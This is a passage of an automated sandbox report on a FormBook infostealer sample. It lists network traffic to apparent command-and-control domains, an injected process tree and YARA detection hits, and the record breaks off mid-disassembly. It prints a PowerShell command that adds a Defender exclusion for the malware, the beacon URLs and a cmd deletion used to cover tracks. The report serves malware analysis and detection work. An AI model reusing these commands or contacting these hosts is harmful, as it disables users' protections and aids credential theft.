                                                        Apr 23, 2024 14:20:55.668734074 CEST53595241.1.1.1192.168.2.5
                                                        Apr 23, 2024 14:21:15.895008087 CEST6549553192.168.2.51.1.1.1
                                                        Apr 23, 2024 14:21:16.002420902 CEST53654951.1.1.1192.168.2.5
                                                        Apr 23, 2024 14:21:56.863759995 CEST5921753192.168.2.51.1.1.1
                                                        Apr 23, 2024 14:21:57.881844997 CEST5921753192.168.2.51.1.1.1
                                                        Apr 23, 2024 14:21:58.590172052 CEST53592171.1.1.1192.168.2.5
                                                        Apr 23, 2024 14:21:58.590213060 CEST53592171.1.1.1192.168.2.5
                                                        Apr 23, 2024 14:22:18.223465919 CEST5838453192.168.2.51.1.1.1
                                                        Apr 23, 2024 14:22:18.342899084 CEST53583841.1.1.1192.168.2.5
                                                        Apr 23, 2024 14:22:38.726823092 CEST6295153192.168.2.51.1.1.1
                                                        Apr 23, 2024 14:22:38.864809990 CEST53629511.1.1.1192.168.2.5
                                                        Apr 23, 2024 14:22:59.130279064 CEST6540053192.168.2.51.1.1.1
                                                        Apr 23, 2024 14:22:59.299431086 CEST53654001.1.1.1192.168.2.5
                                                        Apr 23, 2024 14:23:20.792583942 CEST5207253192.168.2.51.1.1.1
                                                        Apr 23, 2024 14:23:20.940700054 CEST53520721.1.1.1192.168.2.5
                                                        Apr 23, 2024 14:23:41.192565918 CEST5127053192.168.2.51.1.1.1
                                                        Apr 23, 2024 14:23:41.397124052 CEST53512701.1.1.1192.168.2.5
                                                        Apr 23, 2024 14:24:03.040910959 CEST5067653192.168.2.51.1.1.1
                                                        Apr 23, 2024 14:24:03.240576982 CEST53506761.1.1.1192.168.2.5
                                                        Apr 23, 2024 14:24:23.816865921 CEST4980253192.168.2.51.1.1.1
                                                        Apr 23, 2024 14:24:24.044819117 CEST53498021.1.1.1192.168.2.5

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Apr 23, 2024 14:20:34.506072998 CEST192.168.2.51.1.1.10x8c2aStandard query (0)www.tronbank.clubA (IP address)IN (0x0001)false
                                                        Apr 23, 2024 14:20:55.410773993 CEST192.168.2.51.1.1.10xdf78Standard query (0)www.signomo.comA (IP address)IN (0x0001)false
                                                        Apr 23, 2024 14:21:15.895008087 CEST192.168.2.51.1.1.10xa89Standard query (0)www.urxetqt.comA (IP address)IN (0x0001)false
                                                        Apr 23, 2024 14:21:56.863759995 CEST192.168.2.51.1.1.10x33d6Standard query (0)www.airzf.comA (IP address)IN (0x0001)false
                                                        Apr 23, 2024 14:21:57.881844997 CEST192.168.2.51.1.1.10x33d6Standard query (0)www.airzf.comA (IP address)IN (0x0001)false
                                                        Apr 23, 2024 14:22:18.223465919 CEST192.168.2.51.1.1.10x3145Standard query (0)www.actnowgreen.comA (IP address)IN (0x0001)false
                                                        Apr 23, 2024 14:22:38.726823092 CEST192.168.2.51.1.1.10xad70Standard query (0)www.udin88b.usA (IP address)IN (0x0001)false
                                                        Apr 23, 2024 14:22:59.130279064 CEST192.168.2.51.1.1.10x8c9cStandard query (0)www.eternalknot1008.comA (IP address)IN (0x0001)false
                                                        Apr 23, 2024 14:23:20.792583942 CEST192.168.2.51.1.1.10x7a09Standard query (0)www.zgcple.infoA (IP address)IN (0x0001)false
                                                        Apr 23, 2024 14:23:41.192565918 CEST192.168.2.51.1.1.10x2dedStandard query (0)www.k2securityhn.comA (IP address)IN (0x0001)false
                                                        Apr 23, 2024 14:24:03.040910959 CEST192.168.2.51.1.1.10xf233Standard query (0)www.wonderdread.cloudA (IP address)IN (0x0001)false
                                                        Apr 23, 2024 14:24:23.816865921 CEST192.168.2.51.1.1.10xedc8Standard query (0)www.umastyle.clubA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Apr 23, 2024 14:20:35.009041071 CEST1.1.1.1192.168.2.50x8c2aNo error (0)www.tronbank.club103.224.212.216A (IP address)IN (0x0001)false
                                                        Apr 23, 2024 14:20:55.668734074 CEST1.1.1.1192.168.2.50xdf78No error (0)www.signomo.comsignomo.comCNAME (Canonical name)IN (0x0001)false
                                                        Apr 23, 2024 14:20:55.668734074 CEST1.1.1.1192.168.2.50xdf78No error (0)signomo.com3.33.130.190A (IP address)IN (0x0001)false
                                                        Apr 23, 2024 14:20:55.668734074 CEST1.1.1.1192.168.2.50xdf78No error (0)signomo.com15.197.148.33A (IP address)IN (0x0001)false
                                                        Apr 23, 2024 14:21:16.002420902 CEST1.1.1.1192.168.2.50xa89Name error (3)www.urxetqt.comnonenoneA (IP address)IN (0x0001)false
                                                        Apr 23, 2024 14:21:58.590172052 CEST1.1.1.1192.168.2.50x33d6No error (0)www.airzf.com154.12.38.29A (IP address)IN (0x0001)false
                                                        Apr 23, 2024 14:21:58.590213060 CEST1.1.1.1192.168.2.50x33d6No error (0)www.airzf.com154.12.38.29A (IP address)IN (0x0001)false
                                                        Apr 23, 2024 14:22:18.342899084 CEST1.1.1.1192.168.2.50x3145Name error (3)www.actnowgreen.comnonenoneA (IP address)IN (0x0001)false
                                                        Apr 23, 2024 14:22:38.864809990 CEST1.1.1.1192.168.2.50xad70No error (0)www.udin88b.us154.83.2.141A (IP address)IN (0x0001)false
                                                        Apr 23, 2024 14:22:38.864809990 CEST1.1.1.1192.168.2.50xad70No error (0)www.udin88b.us154.83.2.115A (IP address)IN (0x0001)false
                                                        Apr 23, 2024 14:22:59.299431086 CEST1.1.1.1192.168.2.50x8c9cNo error (0)www.eternalknot1008.comd876e8-a4.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                        Apr 23, 2024 14:22:59.299431086 CEST1.1.1.1192.168.2.50x8c9cNo error (0)d876e8-a4.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                        Apr 23, 2024 14:22:59.299431086 CEST1.1.1.1192.168.2.50x8c9cNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                        Apr 23, 2024 14:23:20.940700054 CEST1.1.1.1192.168.2.50x7a09Name error (3)www.zgcple.infononenoneA (IP address)IN (0x0001)false
                                                        Apr 23, 2024 14:23:41.397124052 CEST1.1.1.1192.168.2.50x2dedNo error (0)www.k2securityhn.comk2securityhn.comCNAME (Canonical name)IN (0x0001)false
                                                        Apr 23, 2024 14:23:41.397124052 CEST1.1.1.1192.168.2.50x2dedNo error (0)k2securityhn.com3.33.130.190A (IP address)IN (0x0001)false
                                                        Apr 23, 2024 14:23:41.397124052 CEST1.1.1.1192.168.2.50x2dedNo error (0)k2securityhn.com15.197.148.33A (IP address)IN (0x0001)false
                                                        Apr 23, 2024 14:24:03.240576982 CEST1.1.1.1192.168.2.50xf233No error (0)www.wonderdread.cloudparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                        Apr 23, 2024 14:24:03.240576982 CEST1.1.1.1192.168.2.50xf233No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                        Apr 23, 2024 14:24:24.044819117 CEST1.1.1.1192.168.2.50xedc8No error (0)www.umastyle.club103.224.212.210A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • www.tronbank.club
                                                        • www.signomo.com
                                                        • www.airzf.com
                                                        • www.k2securityhn.com

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.549717103.224.212.216801028C:\Windows\explorer.exe
                                                        TimestampBytes transferredDirectionData
                                                        Apr 23, 2024 14:20:35.162353039 CEST158OUTGET /gs12/?4h0=l5+ohMyXvfUY1BXURi/VBBPK89EwzQ1xmTW49ppdAXwminvYBxYYysXiCF4Xd1c73Byq&vT=LtxxLba HTTP/1.1
                                                        Host: www.tronbank.club
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Apr 23, 2024 14:20:35.358288050 CEST422INHTTP/1.1 302 Found
                                                        date: Tue, 23 Apr 2024 12:20:35 GMT
                                                        server: Apache
                                                        set-cookie: __tad=1713874835.4057426; expires=Fri, 21-Apr-2034 12:20:35 GMT; Max-Age=315360000
                                                        location: http://ww25.tronbank.club/gs12/?4h0=l5+ohMyXvfUY1BXURi/VBBPK89EwzQ1xmTW49ppdAXwminvYBxYYysXiCF4Xd1c73Byq&vT=LtxxLba&subid1=20240423-2220-3536-b2ed-03f98b483855
                                                        content-length: 2
                                                        content-type: text/html; charset=UTF-8
                                                        connection: close
                                                        Data Raw: 0a 0a
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.5497193.33.130.190801028C:\Windows\explorer.exe
                                                        TimestampBytes transferredDirectionData
                                                        Apr 23, 2024 14:20:55.777256966 CEST156OUTGET /gs12/?4h0=sKMZ9JWmyHzsFnuZp0fZtWbmtlVDzCM4ZbYLfRKv+HtPtGiIGUjdRyYwPYcfKf7QGcOF&vT=LtxxLba HTTP/1.1
                                                        Host: www.signomo.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Apr 23, 2024 14:20:55.902518988 CEST338INHTTP/1.1 200 OK
                                                        Server: openresty
                                                        Date: Tue, 23 Apr 2024 12:20:55 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 198
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 34 68 30 3d 73 4b 4d 5a 39 4a 57 6d 79 48 7a 73 46 6e 75 5a 70 30 66 5a 74 57 62 6d 74 6c 56 44 7a 43 4d 34 5a 62 59 4c 66 52 4b 76 2b 48 74 50 74 47 69 49 47 55 6a 64 52 79 59 77 50 59 63 66 4b 66 37 51 47 63 4f 46 26 76 54 3d 4c 74 78 78 4c 62 61 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?4h0=sKMZ9JWmyHzsFnuZp0fZtWbmtlVDzCM4ZbYLfRKv+HtPtGiIGUjdRyYwPYcfKf7QGcOF&vT=LtxxLba"}</script></head></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.549721154.12.38.29801028C:\Windows\explorer.exe
                                                        TimestampBytes transferredDirectionData
                                                        Apr 23, 2024 14:21:58.737889051 CEST154OUTGET /gs12/?4h0=DR9+51q0CIrIDgcjStoZ4W0ewB14phJf97sbOZAiDLbqJph64OQ6FfPwpz0r/rXmCdIn&vT=LtxxLba HTTP/1.1
                                                        Host: www.airzf.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Apr 23, 2024 14:21:58.885886908 CEST481INHTTP/1.1 301 Moved Permanently
                                                        Server: nginx
                                                        Date: Tue, 23 Apr 2024 12:21:58 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 162
                                                        Connection: close
                                                        Location: https://www.airzf.com/gs12/?4h0=DR9+51q0CIrIDgcjStoZ4W0ewB14phJf97sbOZAiDLbqJph64OQ6FfPwpz0r/rXmCdIn&vT=LtxxLba
                                                        Strict-Transport-Security: max-age=31536000
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3192.168.2.5497243.33.130.19080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 23, 2024 14:23:41.505845070 CEST161OUTGET /gs12/?4h0=q59tBajeIo68CyAO1CDG6iJlXnRVkR/RpgQvK7vE3BQj9j+5I7CNTMK9jJbO36qf2KSo&vT=LtxxLba HTTP/1.1
                                                        Host: www.k2securityhn.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Apr 23, 2024 14:23:41.627742052 CEST338INHTTP/1.1 200 OK
                                                        Server: openresty
                                                        Date: Tue, 23 Apr 2024 12:23:41 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 198
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 34 68 30 3d 71 35 39 74 42 61 6a 65 49 6f 36 38 43 79 41 4f 31 43 44 47 36 69 4a 6c 58 6e 52 56 6b 52 2f 52 70 67 51 76 4b 37 76 45 33 42 51 6a 39 6a 2b 35 49 37 43 4e 54 4d 4b 39 6a 4a 62 4f 33 36 71 66 32 4b 53 6f 26 76 54 3d 4c 74 78 78 4c 62 61 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?4h0=q59tBajeIo68CyAO1CDG6iJlXnRVkR/RpgQvK7vE3BQj9j+5I7CNTMK9jJbO36qf2KSo&vT=LtxxLba"}</script></head></html>


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:14:19:54
                                                        Start date:23/04/2024
                                                        Path:C:\Users\user\Desktop\Pago pendiente.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\Pago pendiente.exe"
                                                        Imagebase:0xe40000
                                                        File size:624'640 bytes
                                                        MD5 hash:9A308E1EA62B7EDE8876E433178957D1
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2011441165.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2011441165.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2011441165.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2011441165.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2011441165.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:3
                                                        Start time:14:19:55
                                                        Start date:23/04/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe"
                                                        Imagebase:0xea0000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:4
                                                        Start time:14:19:55
                                                        Start date:23/04/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:5
                                                        Start time:14:19:55
                                                        Start date:23/04/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                        Imagebase:0x8c0000
                                                        File size:45'984 bytes
                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:6
                                                        Start time:14:19:56
                                                        Start date:23/04/2024
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Explorer.EXE
                                                        Imagebase:0x7ff674740000
                                                        File size:5'141'208 bytes
                                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000006.00000002.4458911697.000000000E4E6000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:7
                                                        Start time:14:19:59
                                                        Start date:23/04/2024
                                                        Path:C:\Windows\SysWOW64\control.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\SysWOW64\control.exe"
                                                        Imagebase:0x60000
                                                        File size:149'504 bytes
                                                        MD5 hash:EBC29AA32C57A54018089CFC9CACAFE8
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.4443748619.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4443748619.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4443748619.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.4443748619.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.4443748619.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:moderate
                                                        Has exited:false

                                                        General

                                                        Target ID:8
                                                        Start time:14:20:03
                                                        Start date:23/04/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                        Imagebase:0x790000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:9
                                                        Start time:14:20:03
                                                        Start date:23/04/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:10.8%
                                                          Dynamic/Decrypted Code Coverage:99.1%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:330
                                                          Total number of Limit Nodes:8
                                                          execution_graph 44625 58b706d 44626 58b7077 44625->44626 44627 58b6bbc 3 API calls 44626->44627 44628 58b7080 44627->44628 44238 58b768c 44240 58b6fd0 44238->44240 44239 58b7d3b 44250 31a71bc 44239->44250 44255 31a8689 44239->44255 44240->44239 44242 58b7c9e 44240->44242 44245 58b6bbc 44240->44245 44246 58b6bc7 44245->44246 44248 31a8689 3 API calls 44246->44248 44249 31a71bc 3 API calls 44246->44249 44247 58b7d63 44247->44240 44248->44247 44249->44247 44252 31a71c7 44250->44252 44251 31a8989 44251->44242 44252->44251 44260 31ad0d8 44252->44260 44265 31ad0c8 44252->44265 44256 31a86c3 44255->44256 44257 31a8989 44256->44257 44258 31ad0d8 3 API calls 44256->44258 44259 31ad0c8 3 API calls 44256->44259 44257->44242 44258->44257 44259->44257 44261 31ad0f9 44260->44261 44262 31ad11d 44261->44262 44270 31ad288 44261->44270 44274 31ad277 44261->44274 44262->44251 44266 31ad0f9 44265->44266 44267 31ad11d 44266->44267 44268 31ad288 3 API calls 44266->44268 44269 31ad277 3 API calls 44266->44269 44267->44251 44268->44267 44269->44267 44271 31ad295 44270->44271 44272 31ad2cf 44271->44272 44278 31abe40 44271->44278 44272->44262 44275 31ad288 44274->44275 44276 31abe40 3 API calls 44275->44276 44277 31ad2cf 44275->44277 44276->44277 44277->44262 44279 31abe4b 44278->44279 44281 31adfe8 44279->44281 44282 31ad63c 44279->44282 44281->44281 44283 31ad647 44282->44283 44284 31a71bc 3 API calls 44283->44284 44285 31ae057 44284->44285 44289 58b0040 44285->44289 44295 58b0006 44285->44295 44286 31ae091 44286->44281 44291 58b0171 44289->44291 44292 58b0071 44289->44292 44290 58b007d 44290->44286 44291->44286 44292->44290 44300 58b0e98 44292->44300 44305 58b0e87 44292->44305 44296 58b0036 44295->44296 44297 58b007d 44296->44297 44298 58b0e98 3 API calls 44296->44298 44299 58b0e87 3 API calls 44296->44299 44297->44286 44298->44297 44299->44297 44301 58b0ec3 44300->44301 44302 58b0f72 44301->44302 44310 58b1c70 44301->44310 44320 58b1d80 44301->44320 44307 58b0ec3 44305->44307 44306 58b0f72 44306->44306 44307->44306 44308 58b1d80 3 API calls 44307->44308 44309 58b1c70 3 API calls 44307->44309 44308->44306 44309->44306 44311 58b1cf2 44310->44311 44312 58b1d89 44311->44312 44314 58b1dbd CreateWindowExW 44311->44314 44313 58b1db5 44312->44313 44318 58b1c70 2 API calls 44312->44318 44325 58b1dd0 44312->44325 44329 58b1dc4 44312->44329 44313->44302 44316 58b1ef4 44314->44316 44318->44313 44322 58b1dd0 CreateWindowExW 44320->44322 44323 58b1c70 3 API calls 44320->44323 44324 58b1dc4 CreateWindowExW 44320->44324 44321 58b1db5 44321->44302 44322->44321 44323->44321 44324->44321 44326 58b1e38 CreateWindowExW 44325->44326 44328 58b1ef4 44326->44328 44330 58b1dd0 CreateWindowExW 44329->44330 44332 58b1ef4 44330->44332 44333 31ab030 44336 31ab117 44333->44336 44334 31ab03f 44337 31ab139 44336->44337 44338 31ab15c 44336->44338 44337->44338 44344 31ab3b9 44337->44344 44348 31ab3c0 44337->44348 44338->44334 44339 31ab154 44339->44338 44340 31ab360 GetModuleHandleW 44339->44340 44341 31ab38d 44340->44341 44341->44334 44345 31ab3c0 44344->44345 44347 31ab3f9 44345->44347 44352 31aa4b0 44345->44352 44347->44339 44349 31ab3d4 44348->44349 44350 31aa4b0 LoadLibraryExW 44349->44350 44351 31ab3f9 44349->44351 44350->44351 44351->44339 44353 31ab580 LoadLibraryExW 44352->44353 44355 31ab5f9 44353->44355 44355->44347 44629 31a47e8 44630 31a47f1 44629->44630 44633 31a47f7 44630->44633 44635 31a48e1 44630->44635 44632 31a4812 44640 31a443c 44633->44640 44636 31a4905 44635->44636 44644 31a4df8 44636->44644 44648 31a4de8 44636->44648 44641 31a4447 44640->44641 44656 31a710c 44641->44656 44643 31a7545 44643->44632 44646 31a4e1f 44644->44646 44645 31a4efc 44646->44645 44652 31a4a64 44646->44652 44649 31a4e1f 44648->44649 44650 31a4efc 44649->44650 44651 31a4a64 CreateActCtxA 44649->44651 44651->44650 44653 31a5e88 CreateActCtxA 44652->44653 44655 31a5f4b 44653->44655 44657 31a7117 44656->44657 44660 31a715c 44657->44660 44659 31a75e5 44659->44643 44661 31a7167 44660->44661 44664 31a718c 44661->44664 44663 31a76c2 44663->44659 44665 31a7197 44664->44665 44666 